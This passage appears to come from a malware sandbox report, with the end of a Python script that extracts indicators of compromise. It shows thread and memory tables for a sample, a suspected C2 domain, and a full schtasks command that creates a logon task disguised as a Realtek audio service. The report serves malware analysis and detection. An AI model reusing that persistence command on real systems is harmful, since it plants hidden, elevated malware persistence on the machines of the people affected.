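            task["user_writable_action"] = bool(USER_WRITABLE.search(task["action"] or ""))
            iocs.scheduled_tasks.append(task)
            if (task["schedule"] or "").upper() in ("ONLOGON", "ONSTART") and task["user_writable_action"]:
                iocs.behaviours.append(("persistence_scheduled_task", task["name"], ok))
    return iocs


if __name__ == "__main__":
    result = extract(SAMPLE_LOG)
    for name in ("mutexes", "ips", "urls", "dns_lookups", "scheduled_tasks", "behaviours"):
        print(f"{name}: {getattr(result, name)}")
```

Feed it the full thread table (minus the "Fn"/"Data" logfile-column cells) and the repeated r3m0te.65cdn.com resolutions show up as a per-host count, which is the quickest way to separate a retrying C2 candidate from one-off lookups such as the ipstack check. The success flag is carried through deliberately: the Zone.Identifier deletion in this run returned False, so a detection keyed only on successful ADS deletions would miss the attempt.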
Thread 0xcc8
0 2
Category Operation Information Success Count Logfile
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Thread 0xccc
3 0
Category Operation Information Success Count Logfile
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 3
Fn
Thread 0xcd4
52 0
Category Operation Information Success Count Logfile
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Module Load module_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\\wminet_utils.dll, base_address = 0x6a310000 True 1
Fn
Module Get Address module_name = Unknown module name, function = ResetSecurity, address_out = 0x6a311944 True 1
Fn
Module Get Address module_name = Unknown module name, function = SetSecurity, address_out = 0x6a311986 True 1
Fn
Module Get Address module_name = Unknown module name, function = BlessIWbemServices, address_out = 0x6a3119cc True 1
Fn
Module Get Address module_name = Unknown module name, function = BlessIWbemServicesObject, address_out = 0x6a311a1e True 1
Fn
Module Get Address module_name = Unknown module name, function = GetPropertyHandle, address_out = 0x6a311a70 True 1
Fn
Module Get Address module_name = Unknown module name, function = WritePropertyValue, address_out = 0x6a311a89 True 1
Fn
Module Get Address module_name = Unknown module name, function = Clone, address_out = 0x6a311aa2 True 1
Fn
Module Get Address module_name = Unknown module name, function = VerifyClientKey, address_out = 0x6a312270 True 1
Fn
Module Get Address module_name = Unknown module name, function = GetQualifierSet, address_out = 0x6a311d73 True 1
Fn
Module Get Address module_name = Unknown module name, function = Get, address_out = 0x6a311b96 True 1
Fn
Module Get Address module_name = Unknown module name, function = Put, address_out = 0x6a311b7a True 1
Fn
Module Get Address module_name = Unknown module name, function = Delete, address_out = 0x6a311bb5 True 1
Fn
Module Get Address module_name = Unknown module name, function = GetNames, address_out = 0x6a311bc8 True 1
Fn
Module Get Address module_name = Unknown module name, function = BeginEnumeration, address_out = 0x6a311be4 True 1
Fn
Module Get Address module_name = Unknown module name, function = Next, address_out = 0x6a311bf7 True 1
Fn
Module Get Address module_name = Unknown module name, function = EndEnumeration, address_out = 0x6a311c16 True 1
Fn
Module Get Address module_name = Unknown module name, function = GetPropertyQualifierSet, address_out = 0x6a311c26 True 1
Fn
Module Get Address module_name = Unknown module name, function = Clone, address_out = 0x6a311aa2 True 1
Fn
Module Get Address module_name = Unknown module name, function = GetObjectText, address_out = 0x6a311c3c True 1
Fn
Module Get Address module_name = Unknown module name, function = SpawnDerivedClass, address_out = 0x6a311c52 True 1
Fn
Module Get Address module_name = Unknown module name, function = SpawnInstance, address_out = 0x6a311c68 True 1
Fn
Module Get Address module_name = Unknown module name, function = CompareTo, address_out = 0x6a311c7e True 1
Fn
Module Get Address module_name = Unknown module name, function = GetPropertyOrigin, address_out = 0x6a311c94 True 1
Fn
Module Get Address module_name = Unknown module name, function = InheritsFrom, address_out = 0x6a311caa True 1
Fn
Module Get Address module_name = Unknown module name, function = GetMethod, address_out = 0x6a311cbd True 1
Fn
Module Get Address module_name = Unknown module name, function = PutMethod, address_out = 0x6a311cd9 True 1
Fn
Module Get Address module_name = Unknown module name, function = DeleteMethod, address_out = 0x6a311cf5 True 1
Fn
Module Get Address module_name = Unknown module name, function = BeginMethodEnumeration, address_out = 0x6a311d08 True 1
Fn
Module Get Address module_name = Unknown module name, function = NextMethod, address_out = 0x6a311d1b True 1
Fn
Module Get Address module_name = Unknown module name, function = EndMethodEnumeration, address_out = 0x6a311d37 True 1
Fn
Module Get Address module_name = Unknown module name, function = GetMethodQualifierSet, address_out = 0x6a311d47 True 1
Fn
Module Get Address module_name = Unknown module name, function = GetMethodOrigin, address_out = 0x6a311d5d True 1
Fn
Module Get Address module_name = Unknown module name, function = QualifierSet_Get, address_out = 0x6a311d86 True 1
Fn
Module Get Address module_name = Unknown module name, function = QualifierSet_Put, address_out = 0x6a311da2 True 1
Fn
Module Get Address module_name = Unknown module name, function = QualifierSet_Delete, address_out = 0x6a311dbb True 1
Fn
Module Get Address module_name = Unknown module name, function = QualifierSet_GetNames, address_out = 0x6a311dce True 1
Fn
Module Get Address module_name = Unknown module name, function = QualifierSet_BeginEnumeration, address_out = 0x6a311de4 True 1
Fn
Module Get Address module_name = Unknown module name, function = QualifierSet_Next, address_out = 0x6a311df7 True 1
Fn
Module Get Address module_name = Unknown module name, function = QualifierSet_EndEnumeration, address_out = 0x6a311e13 True 1
Fn
Module Get Address module_name = Unknown module name, function = GetCurrentApartmentType, address_out = 0x6a311d73 True 1
Fn
Module Get Address module_name = Unknown module name, function = GetDemultiplexedStub, address_out = 0x6a3118fd True 1
Fn
Module Get Address module_name = Unknown module name, function = CreateInstanceEnumWmi, address_out = 0x6a311580 True 1
Fn
Module Get Address module_name = Unknown module name, function = CreateClassEnumWmi, address_out = 0x6a3115f6 True 1
Fn
Module Get Address module_name = Unknown module name, function = ExecQueryWmi, address_out = 0x6a31169e True 1
Fn
Module Get Address module_name = Unknown module name, function = ExecNotificationQueryWmi, address_out = 0x6a311717 True 1
Fn
Module Get Address module_name = Unknown module name, function = PutInstanceWmi, address_out = 0x6a311790 True 1
Fn
Module Get Address module_name = Unknown module name, function = PutClassWmi, address_out = 0x6a311810 True 1
Fn
Module Get Address module_name = Unknown module name, function = CloneEnumWbemClassObject, address_out = 0x6a311890 True 1
Fn
Module Get Address module_name = Unknown module name, function = ConnectServerWmi, address_out = 0x6a3124b7 True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Thread 0xce0
2 0
Category Operation Information Success Count Logfile
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Process #12: schtasks.exe
19 0
Information Value
ID #12
File Name c:\windows\system32\schtasks.exe
Command Line "schtasks" /create /tn "Realtek Audio Service" /sc ONLOGON /tr "C:\Users\EEBsYm5\AppData\Roaming\Realtek\RealtekAudio.exe" /rl HIGHEST /f
Initial Working Directory C:\Users\EEBsYm5\Desktop\
Monitor Start Time: 00:01:45, Reason: Child Process
Unmonitor End Time: 00:01:46, Reason: Self Terminated
Monitor Duration 00:00:01
OS Process Information
Information Value
PID 0xcec
Parent PID 0xca0 (c:\users\eebsym5\appdata\roaming\realtek\realtekaudio.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username CRH2YWU7\EEBsYm5
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0xCF0
0xD00
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory r True False False -
locale.nls 0x00050000 0x000b6fff Memory Mapped File r False False False -
pagefile_0x00000000000c0000 0x000c0000 0x000c6fff Pagefile Backed Memory r True False False -
pagefile_0x00000000000d0000 0x000d0000 0x000d1fff Pagefile Backed Memory rw True False False -
schtasks.exe.mui 0x000e0000 0x000f1fff Memory Mapped File rw False False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory rw True False False -
private_0x0000000000110000 0x00110000 0x0014ffff Private Memory rw True False False -
private_0x0000000000150000 0x00150000 0x00150fff Private Memory rw True False False -
rpcss.dll 0x00160000 0x001bbfff Memory Mapped File r False False False -
pagefile_0x0000000000160000 0x00160000 0x00160fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000170000 0x00170000 0x00170fff Pagefile Backed Memory r True False False -
private_0x00000000001d0000 0x001d0000 0x001dffff Private Memory rw True False False -
pagefile_0x00000000001e0000 0x001e0000 0x002a7fff Pagefile Backed Memory r True False False -
schtasks.exe 0x002f0000 0x0031dfff Memory Mapped File rwx True False False -
pagefile_0x0000000000320000 0x00320000 0x00420fff Pagefile Backed Memory r True False False -
private_0x0000000000480000 0x00480000 0x0057ffff Private Memory rw True False False -
pagefile_0x0000000000580000 0x00580000 0x0117ffff Pagefile Backed Memory r True False False -
sortdefault.nls 0x01180000 0x0144efff Memory Mapped File r False False False -
private_0x0000000001450000 0x01450000 0x015affff Private Memory rw True False False -
pagefile_0x0000000001450000 0x01450000 0x0152efff Pagefile Backed Memory r True False False -
private_0x0000000001570000 0x01570000 0x015affff Private Memory rw True False False -
private_0x0000000001690000 0x01690000 0x016cffff Private Memory rw True False False -
ktmw32.dll 0x734c0000 0x734c8fff Memory Mapped File rwx False False False -
taskschd.dll 0x739e0000 0x73a5cfff Memory Mapped File rwx False False False -
xmllite.dll 0x73e80000 0x73eaefff Memory Mapped File rwx False False False -
uxtheme.dll 0x741e0000 0x7421ffff Memory Mapped File rwx False False False -
version.dll 0x748d0000 0x748d8fff Memory Mapped File rwx False False False -
sspicli.dll 0x752b0000 0x752cafff Memory Mapped File rwx False False False -
cryptbase.dll 0x752d0000 0x752dbfff Memory Mapped File rwx False False False -
kernelbase.dll 0x75540000 0x75589fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x75680000 0x75720fff Memory Mapped File rwx False False False -
clbcatq.dll 0x75780000 0x75802fff Memory Mapped File rwx False False False -
lpk.dll 0x76480000 0x76489fff Memory Mapped File rwx False False False -
imm32.dll 0x76490000 0x764aefff Memory Mapped File rwx False False False -
ole32.dll 0x76750000 0x768abfff Memory Mapped File rwx False False False -
kernel32.dll 0x76910000 0x769e3fff Memory Mapped File rwx False False False -
advapi32.dll 0x769f0000 0x76a8ffff Memory Mapped File rwx False False False -
msvcrt.dll 0x76a90000 0x76b3bfff Memory Mapped File rwx False False False -
user32.dll 0x76b40000 0x76c08fff Memory Mapped File rwx False False False -
oleaut32.dll 0x76c10000 0x76c9efff Memory Mapped File rwx False False False -
msctf.dll 0x76ca0000 0x76d6bfff Memory Mapped File rwx False False False -
usp10.dll 0x76d70000 0x76e0cfff Memory Mapped File rwx False False False -
shlwapi.dll 0x76e10000 0x76e66fff Memory Mapped File rwx False False False -
ntdll.dll 0x77230000 0x7736bfff Memory Mapped File rwx False False False -
sechost.dll 0x773c0000 0x773d8fff Memory Mapped File rwx False False False -
gdi32.dll 0x773e0000 0x7742dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x77470000 0x77470fff Memory Mapped File rwx False False False -
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory r True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffd9000 0x7ffd9000 0x7ffd9fff Private Memory rw True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
Threads
Thread 0xcf0
19 0
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-08-10 04:09:39 (UTC) True 1
Fn
System Get Time type = Ticks, time = 159589 True 1
Fn
Module Get Handle module_name = c:\windows\system32\schtasks.exe, base_address = 0x2f0000 True 1
Fn
Module Get Filename process_name = c:\windows\system32\schtasks.exe, file_name_orig = C:\Windows\system32\schtasks.exe, size = 260 True 1
Fn
Module Load module_name = VERSION.dll, base_address = 0x748d0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\version.dll, function = GetFileVersionInfoSizeW, address_out = 0x748d19d9 True 1
Fn
Module Get Address module_name = c:\windows\system32\version.dll, function = GetFileVersionInfoW, address_out = 0x748d19f4 True 1
Fn
Module Get Address module_name = c:\windows\system32\version.dll, function = VerQueryValueW, address_out = 0x748d1b51 True 1
Fn
Module Get Filename process_name = c:\windows\system32\schtasks.exe, file_name_orig = C:\Windows\system32\schtasks.exe, size = 260 True 1
Fn
COM Create interface = 2FABA4C7-4DA9-4013-9697-20CC3FD40F85, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
System Get Time type = Local Time, time = 2018-08-10 02:09:39 (Local Time) True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x769f0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = GetUserNameW, address_out = 0x76a0157a True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 83 True 1
Fn
Data